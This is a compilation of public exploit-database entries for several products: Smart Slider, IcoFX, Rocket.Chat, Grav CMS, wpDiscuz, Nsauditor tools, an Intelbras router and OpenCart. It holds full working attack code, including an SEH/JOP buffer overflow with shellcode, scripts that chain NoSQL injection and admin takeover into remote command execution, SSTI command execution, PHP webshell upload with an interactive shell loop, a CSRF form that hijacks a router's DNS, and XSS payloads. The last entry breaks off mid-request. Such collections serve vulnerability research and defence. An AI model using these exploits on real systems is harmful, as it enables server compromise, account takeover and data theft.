# Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS) # Exploit Author: Hardik Solanki # Date: 05/06/2021 # Software Link: https://wordpress.org/plugins/smart-slider-3/ # Version: 3.5.0.8 # Tested on Windows *How to reproduce vulnerability:* 1. Install WordPress 5.7.2 2. Install and activate the "*Smart Slider 3" Version 3.5.0.8* plugin 3. Navigate to "*Dashboard* and create a "*New Project*". 4. Enter the JavaScript payload "*<script>alert(document.cookie)</script>*" into the "*Name*" field. 5. You will observe that the Project has been created with malicious JavaScript payload "<script>alert(document.cookie)</script>" and hence project has been* created/stored* and thus JavaScript payload is executing successfully. *XSS IMPACT:* 1: Steal the cookie 2: User redirection to a malicious website

# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP # Date: 2020-05-20 # Exploit Author: Austin Babcock # Vendor Homepage: https://icofx.ro/ # Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing # Version: 2.6.0.0 # Tested on: Windows 7 Ultimate x64 # CVE: CVE-2013-4988 # Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu # Payload Length: 1626 bytes #While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate. #Gadgets were found using the JOP ROCKET tool which is available at https://github.com/Bw3ll/JOP_ROCKET #This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). #JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table. #The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes. #After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget. #Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget. #In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address. #The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address.. #!/usr/bin/python2 import struct # Stuff we'll need for creating our malicious .ico header = "\x00\x00\x01\x00\x00\x6F" option = "\x02\x00\x00\x00" pad2 = "\x41"*8 nseh = "\xfe\xff\xff\xff" base = 0x400000 # SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET seh = struct.pack('<L', 0x0044f012) ########################### #### LOAD DISPATCH TABLE ADDR INTO ECX #### #The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory. jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <- jopSetup += struct.pack('<I',0x0000000) #clear ecx jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN jopSetup += struct.pack('<I',0x00009f0) # offset for disp table jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table #### LOAD ADD VALUE PTR INTO EAX #### #Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table, #eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes. #In this case, eax will point to an address containing the value 0x00000004. jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <- jopSetup += struct.pack('<I',0x0000000) # junk jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN #### LOAD WRITABLE ADDR OFFSET INTO EBX #### #The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided. #In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so #that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value. jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr #### LOAD DISPATCHER ADDR INTO EDI #### jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address #Dispatcher: #add ecx, dword ptr [eax] 0x406d81 (offset 0x6d81) #jmp dword ptr [ecx] #### BEGIN JOP -- PERFORM STACK PIVOT #### jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI table = struct.pack('<I',0x44444444) # padding #PIVOT 40 BYTES #Last POP will put VP ptr in EBP for i in range(10): table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <- #### CALL VirtualProtect() #### #The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp. #To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order #to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below. table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <- # VP ptr + offset for jmp ebp gadget vpPtr = struct.pack('<I',0x00bf6668 + 0x71) ############################################################################################ msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80" "\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED" "\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75" "\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" "\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51" "\x50\xFF\xD7") # ExitProcess(0); exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10" addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode shellcode = addesp + msg_sc + exit_sc nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20 # padding until VP parameter location paramPad = "C" *(36) paramPad += vpPtr ### VIRTUAL PROTECT PARAMETERS ### vpParams = struct.pack('<I',0x18f744) #return addr vpParams += struct.pack('<I',0x18f744) #lpAddr vpParams += struct.pack('<I',0x500) #dwSize vpParams += struct.pack('<I',0x40) #flNewProt vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect # pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table pad1 = "A"*580 + jopSetup + paramPad + vpParams + nopwrap addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address pad1 += addVal pad1 += table # dispatch table pad1 += "B"*(0x640-len(pad1)) # Piece together our exploit payload = header + pad1 + option + pad2 + nseh + seh # Write out our malicious file writeFile = open ("maliciousJOP.ico", "wb") writeFile.write( payload ) writeFile.close()

# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting reset token token = resettoken(target) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticting and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)

# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link: https://getgrav.org/download/core/grav-admin/1.7.10 # Vulnerable Version(s): Grav CMS 1.7.10 # CVE: CVE-2021-29440 # Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities # NOTES: You need a user who has access to /admin dashboard with page creation privileges. #!/usr/bin/python import requests from bs4 import BeautifulSoup import random import string username = 'username' password = 'password' url = 'http://grav.local' session = requests.Session() # Autheticating ## Getting login-nonce def login(url,username,password): r = session.get(url + "/admin") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[2]) nonce = nonce[47:79] ## Logging in payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = session.post(url+"/admin",data=payload,headers=headers) # Creating Page for RCE def rce(url,cmd): ## Getting form nonce and unique form id project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8)) r = session.get(url+f"/admin/pages/{project_name}/:add") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[72]) form_id = str(soup.findAll('input')[71]) form_id = form_id[54:86] nonce = nonce[46:78] ## Creating Page headers = {'Content-Type': 'application/x-www-form-urlencoded'} payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0' r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers) ## Getting command output r = session.get(url+f"/{project_name.lower()}") if 'SyntaxError' in r.text: print("[-] Command error") else: a = r.text.split('<section id="body-wrapper" class="section">') b = a[1].split('</section>') print(b[0][58:]) # Cleaning up ## Getting admin-nonce r = session.get(url + "/admin/pages") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[32]) nonce = nonce[47:79] ## Deleting Page r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}") login(url,username,password) while True: cmd = input("$ ") rce(url,cmd)

# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe # Version: 1.6.8 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Go to Register > Enter Registration Code... #3.- Write anything in 'Name' field #4.- Paste clipboard in 'Key' field #5.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()

# Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/wpdiscuz/ # Date: 2021-06-06 # Original Author: Chloe Chamberland # Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0 # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: 7.0.4 # Tested on: Ubuntu / WordPress 5.6.2 # CVE : CVE-2020-24186 #!/bin/bash if [ -z $1 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 elif [ -z $2 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 else post=$(curl -sI http://$1$2/ | head -n1) if [[ "$post" == *"200 OK"* ]]; then wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3) webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a system($cmd);\x0d\x0a die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g') echo -e "\nWebshell:" $webshell"\n" echo -e "--------------WIN--------------" echo -e " ¡Got webshell! " echo -e "-------------------------------\n" while : do read -p '$ ' command curl -s $webshell?cmd=$command | grep -v GIF8 done else echo -e "\n[!] The indicated post was not found\n" fi fi

# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) # Date: 2021/06/08 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: wpDiscuz 7.0.4 # Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2) # CVE : CVE-2020-24186 # Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I) #!/bin/python3 import requests import optparse import re import random import time import string import json parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost") options, args = parser.parse_args() if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost') print('[+] Example help usage: exploit.py -h') exit() session = requests.Session() main_url = options.url path = options.path url_blog = main_url + path clean_host = main_url.replace('http://', '').replace('/wordpress','') def banner(): print('---------------------------------------------------------------') print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution') print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload') print('[-] CVE: CVE-2020-24186') print('[-] https://github.com/hevox') print('--------------------------------------------------------------- \n') def csrfRequest(): global wmuSec global wc_post_id try: get_html = session.get(url_blog) response_len = str(len(get_html.text)) response_code = str(get_html.status_code) print('[+] Response length:['+response_len+'] | code:['+response_code+']') raw_wmu = get_html.text.replace(',','\n') wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wmuSec +'') raw_postID = get_html.text.replace(',','\n') wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wc_post_id +' \n') except requests.exceptions.ConnectionError as err: print('\n[x] Failed to Connect in: '+url_blog+' ') print('[x] This host seems to be Down') exit() def nameRandom(): global shell_name print('[+] Generating random name for Webshell...') shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) time.sleep(1) print('[!] Generated webshell name: '+shell_name+'\n') return shell_name def shell_upload(): global shell print('[!] Trying to Upload Webshell..') try: upload_url = main_url + "/wp-admin/admin-ajax.php" upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog} upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n" check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) json_object = (json.loads(check.text)) status = (json_object["success"]) get_path = (check.text.replace(',','\n')) shell_pret = re.findall('url.*$',get_path,re.MULTILINE) find_shell = str(shell_pret) raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'','')) shell = (raw.split(" ",1)[0]) if status == True: print('[+] Upload Success... Webshell path:' +shell+' \n') else: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') exit() except requests.exceptions.HTTPError as conn: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') return shell def code_exec(): try: while True: cmd = input('> ') codex = session.get(shell + '?cmd='+cmd+'') print(codex.text.replace('GIF689a;','').replace('�','')) except: print('\n[x] Failed to execute PHP code...') banner() csrfRequest() nameRandom() shell_upload() code_exec()

# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.3.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open Nsauditor.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()

# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Version: 2.2.7.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open BackupKeyRecovery.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("poc.txt", "w") f.write(buffer) f.close()

# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) # Date: 01/05/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware 1.1.2-1.1.5 # CVE: 2021-32403 # Exploit Code: <html> <form action="http://10.0.0.1/goform/setSysTools" method="POST"> <input name="module3" value="lanCfg" type="hidden"> <input name="lanIP" value="10.0.0.1" type="hidden"> <input name="lanMask" value="255.255.255.0" type="hidden"> <input name="dhcpEn" value="true" type="hidden"> <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden"> <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden"> <input name="lanDns1" value="192.168.0.30" type="hidden"> <input name="lanDns2" value="" type="hidden"> </form> <script> document.forms[0].submit(); </script> </html>

# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) # Date : 2021/08/06 # Exploit Author : Mert Daş [email protected] # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Tested on: Server : Xampp # Cross-site request forgery OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /opencart/index.php?route=account/password HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675 Content-Length: 300 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/index.php?route=account/password Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 Upgrade-Insecure-Requests: 1 -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="password" 123asd! -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="confirm" 123asd! -----------------------------3890527419799841332130342675-- Response HTTP/1.1 302 Found Date: Tue, 08 Jun 2021 16:52:59 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/ Location: http://127.0.0.1/opencart/index.php?route=account/account Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ---------------------------------------------------------- Simple Poc to change user Password <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="1234asd!" /> <input type="hidden" name="confirm" value="1234asd!" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 2021/08/06 # Exploit Author: Mert Daş # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.7 # Tested on: Windows 10 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the Marketing-Mail option. 3. Put the below payload in subject field of the Mail : "<script>alert(11111)</script>" 5. Now click on send button. 6. The XSS will be triggered. POST /opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows 